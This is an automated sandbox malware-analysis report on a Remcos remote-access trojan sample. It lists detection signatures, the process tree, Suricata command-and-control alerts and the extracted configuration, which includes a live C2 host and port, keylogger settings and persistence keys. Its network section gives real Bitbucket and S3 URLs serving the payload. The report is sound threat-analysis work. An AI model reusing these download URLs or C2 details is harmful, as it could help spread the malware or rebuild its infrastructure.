Windows Analysis Report
3XSXmrEOw7.exe

Overview

General Information

Sample name: 3XSXmrEOw7.exe (renamed because original name is a hash value)
Original sample name: 972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce.exe
Analysis ID: 1573895
MD5: ddce3b9704d1e4236548b1a458317dd0
SHA1: a48a65dbcba5a65d89688e1b4eac0deef65928c8
SHA256: 972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce
Tags: 181-131-217-244, exe, user-JAMESWT_MHT

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates multiple autostart registry keys
Drops large PE files
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • 3XSXmrEOw7.exe (PID: 5524 cmdline: "C:\Users\user\Desktop\3XSXmrEOw7.exe" MD5: DDCE3B9704D1E4236548B1A458317DD0)
    • csc.exe (PID: 5776 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
  • yjfesx.exe (PID: 5860 cmdline: C:\Users\user\AppData\Local\Temp\yjfesx.exe MD5: 27650AFE28BA588C759ADE95BF403833)
    • yjfesx.exe (PID: 768 cmdline: "C:\Users\user\AppData\Local\Temp\yjfesx.exe" MD5: 27650AFE28BA588C759ADE95BF403833)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["newstaticfreepoint24.ddns-ip.net:1842:0"], "Assigned name": "FUTURAMA", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jdjgkdgjgkjhh-8DHJNN", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "fdgfghgfhg", "Keylog file max size": ""}
Source | Rule | Description | Author | Strings
00000003.00000002.3994827103.0000000009880000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000005.00000000.2506800758.0000000000401000.00000020.00000001.01000000.00000008.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
3.2.csc.exe.8036e08.2.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
3.2.csc.exe.9880000.4.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
5.2.yjfesx.exe.5b30000.1.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
5.2.yjfesx.exe.5b30000.1.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
5.2.yjfesx.exe.5b30000.1.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |

                      System Summary

                      Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\3XSXmrEOw7.exe, ProcessId: 5524, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI

                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2024-12-12T17:42:16.545424+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49831 | 181.131.217.244 | 1842 | TCP
                      2024-12-12T17:42:17.820688+0100 | 2032777 | 1 | Malware Command and Control Activity Detected | 181.131.217.244 | 1842 | 192.168.2.5 | 49831 | TCP
                      2024-12-12T17:44:20.335417+0100 | 2032777 | 1 | Malware Command and Control Activity Detected | 181.131.217.244 | 1842 | 192.168.2.5 | 49831 | TCP
                      2024-12-12T17:42:19.877289+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.5 | 49836 | 178.237.33.50 | 80 | TCP

                      AV Detection

                      Source: 3XSXmrEOw7.exe | Avira: detected
                      Source: 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos
                      Source: 3XSXmrEOw7.exe | ReversingLabs: Detection: 28%
                      Source: Yara match | File source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: yjfesx.exe PID: 5860, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: yjfesx.exe PID: 768, type: MEMORYSTR
                      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
                      Source: yjfesx.exe, 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_3d0bf4d2-6

                      Exploits

                      Source: Yara match | File source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: yjfesx.exe PID: 5860, type: MEMORYSTR

                      Compliance

                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Unpacked PE file: 0.2.3XSXmrEOw7.exe.2420000.2.unpack
                      Source: 3XSXmrEOw7.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49736 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 54.231.203.105:443 -> 192.168.2.5:49743 version: TLS 1.2
                      Source: Binary string: Swvvzalx.pdb source: csc.exe, csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000080AD000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994615289.0000000009700000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.3995314411.0000000009FB0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000708E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.3995314411.0000000009FB0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000708E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: c:\installer\incremental installer7\dev\AutoRun7\Release\autorun7.pdb source: 3XSXmrEOw7.exe, ElectronArtsCLI.exe.0.dr
                      Source: Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_0040A0D8 FindNextFileA,FindClose,FindFirstFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,0_2_0040A0D8
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_004151A0 FindFirstFileA,FindClose,GetFileAttributesA,SetFileAttributesA,SetLastError,CopyFileA,GetLastError,SetLastError,GetLastError,GetFileAttributesA,SetFileAttributesA,0_2_004151A0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414290 FindFirstFileA,FindClose,FindClose,0_2_00414290
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414340 FindFirstFileA,FindClose,0_2_00414340
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414380 FindFirstFileA,FindClose,FindFirstFileA,FindClose,CreateDirectoryA,RemoveDirectoryA,Sleep,FindFirstFileA,FindClose,RemoveDirectoryA,Sleep,0_2_00414380
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_004145D0 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_004145D0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00415590 FindFirstFileA,CreateDirectoryA,CreateDirectoryA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00415590
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414626 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00414626
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414697 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00414697
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_004156B5 FindFirstFileA,CreateDirectoryA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_004156B5
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00415858 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00415858
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00413800 FindFirstFileA,FindClose,0_2_00413800
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414A00 FindFirstFileA,FindClose,Sleep,Sleep,Sleep,GetFileAttributesA,SetFileAttributesA,DeleteFileA,0_2_00414A00
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414C50 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00414C50
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_0040AC10 FindFirstFileA,FindNextFileA,FindClose,0_2_0040AC10
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414D36 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00414D36
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00413E20 GetCurrentDirectoryA,FindFirstFileA,FindClose,SetCurrentDirectoryA,FindFirstFileA,FindClose,CreateProcessA,Sleep,SetLastError,CreateProcessA,GetExitCodeProcess,Sleep,Sleep,SetCurrentDirectoryA,GetLastError,FormatMessageA,LocalFree,0_2_00413E20
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00417E90 FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00417E90
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00409F7A FindFirstFileA,GetFileAttributesA,SetFileAttributesA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,0_2_00409F7A
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exe | Code function: 0_2_00414F30 FindFirstFileA,FindClose,FindClose,0_2_00414F30

                      Networking

                      Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49831 -> 181.131.217.244:1842
                      Source: Network traffic | Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 181.131.217.244:1842 -> 192.168.2.5:49831
                      Source: Malware configuration extractor | URLs: newstaticfreepoint24.ddns-ip.net
                      Source: global traffic | TCP traffic: 192.168.2.5:49729 -> 181.131.217.244:30203
                      Source: global traffic | HTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIK3V4DGT&Signature=CeSXCizIndXdpo0hNVhQNHPO6YE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJGMEQCIAiR1Rr4gukDYzqDqe6VyCYznX6djf6omD53N9z5eXxNAiAOa4oQ0hLIqn6hHaGwFLs9dy9CGpADmC9r%2BgzzvYixzCqwAgjC%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMdLt8wvGnGxpQ3VhgKoQCe8wqaRBxnVnGmgCUhs6TWySAMRXKxScrbgQIw1l5TliYWycjvfrdQ9KAUuNMU%2FwhakGHoE0SFuTSYhrM1G9PRALReQarQNdwzYN63jorLJ4YWbF3XMNkCEIyc7ndfWAWAsw%2FfjWHG0%2BHTpx6RPw%2FIQG57%2Fn5zg5wiHWoPYYes5WgRI5TNywnrgMzT2HeQqLoN3qnaIg%2BAtnkqDKS5EY2FY6PH72PmOl7UVqeyAnEuwwblKQlwD8%2FDNIruRgkrhDndJwiNI%2Fjj%2Fbmpx1PYlG3DYXUkX3nG9qpqdlp9qaxg66RItC8i7CuMgnCQGyIpd9Ne8xvpXMpMHF7fcuhoxTOVxRBVHQwsaPsugY6ngFGmq3npFGM4oH6YpgZGTfIpeNNKlZdAXKSvIsR6TfEz3KZeh4E29gHAGlbMUmtWcvwuflus8R05%2FCWtxLjrJB20TKCSAJ0mZ7ha8acTW5DNuxqW4A6JSpacupf41tUXUKIvQwULtF4tmDv7359nQosi0CBcA%2F4VOm6lqogmU0NyZY9bZyJ4%2BwRjnbrHuOJtTOOxuSqcBPZRUcYiqA%2FuQ%3D%3D&Expires=1734023353 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
                      Source: Joe Sandbox View | IP Address: 181.131.217.244
                      Source: Joe Sandbox View | IP Address: 185.166.143.48
                      Source: Joe Sandbox View | IP Address: 178.237.33.50
                      Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49836 -> 178.237.33.50:80
                      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global traffic | DNS traffic detected: DNS query: navegacionseguracol24vip.org
                      Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
                      Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                      Source: global traffic | DNS traffic detected: DNS query: newstaticfreepoint24.ddns-ip.net
                      Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
                      Source: csc.exe, 00000003.00000002.3992663991.000000000715F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.com
                      Source: csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
                      Source: yjfesx.exe, 00000006.00000003.2775384504.0000000009A2B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                      Source: yjfesx.exe, 00000006.00000003.2775384504.0000000009A2B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/$
                      Source: yjfesx.exe, 00000006.00000003.2775384504.0000000009A2B000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                      Source: yjfesx.exe, 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: yjfesx.exe, 00000006.00000003.2775384504.0000000009A1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp0
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A1A000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpI
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A13000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A1A000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpT
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A1A000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                      Source: yjfesx.exe, 00000006.00000003.2775384504.0000000009A2B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpz
                      Source: csc.exe, 00000003.00000002.3991731167.0000000004F9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.cC
                      Source: csc.exe, 00000003.00000002.3992663991.000000000715F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.com
                      Source: csc.exe, 00000003.00000002.3992663991.00000000071CB000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.0000000006E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: csc.exe, 00000003.00000003.2510018923.00000000085F0000.00000004.00000800.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000002.2829283806.00000000136AE000.00000004.00001000.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000000.2506800758.000000000051C000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.5.drString found in binary or memory: http://www.hdsentinel.com
                      Source: csc.exe, 00000003.00000003.2510018923.00000000085F0000.00000004.00000800.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000002.2829283806.00000000136AE000.00000004.00001000.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000000.2506800758.000000000051C000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.5.drString found in binary or memory: http://www.hdsentinel.com/sendreport.phpU
                      Source: csc.exe, 00000003.00000003.2510018923.00000000085F0000.00000004.00000800.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000002.2829283806.00000000136AE000.00000004.00001000.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000000.2506800758.000000000051C000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.5.drString found in binary or memory: http://www.hdsentinel.comU
                      Source: HardDiskSentinelBin.exe.5.drString found in binary or memory: http://www.indyproject.org/
                      Source: 3XSXmrEOw7.exeString found in binary or memory: http://www.microsoft.c
                      Source: csc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                      Source: csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                      Source: csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                      Source: csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                      Source: csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws
                      Source: csc.exe, 00000003.00000002.3992663991.0000000006ECA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                      Source: csc.exe, 00000003.00000002.3992663991.0000000006ECA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-
                      Source: csc.exe, 00000003.00000002.3992663991.000000000710D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.0000000006E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                      Source: csc.exe, 00000003.00000002.3992663991.000000000708E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/facturacioncol/fact/downloads/null.exe
                      Source: csc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                      Source: csc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
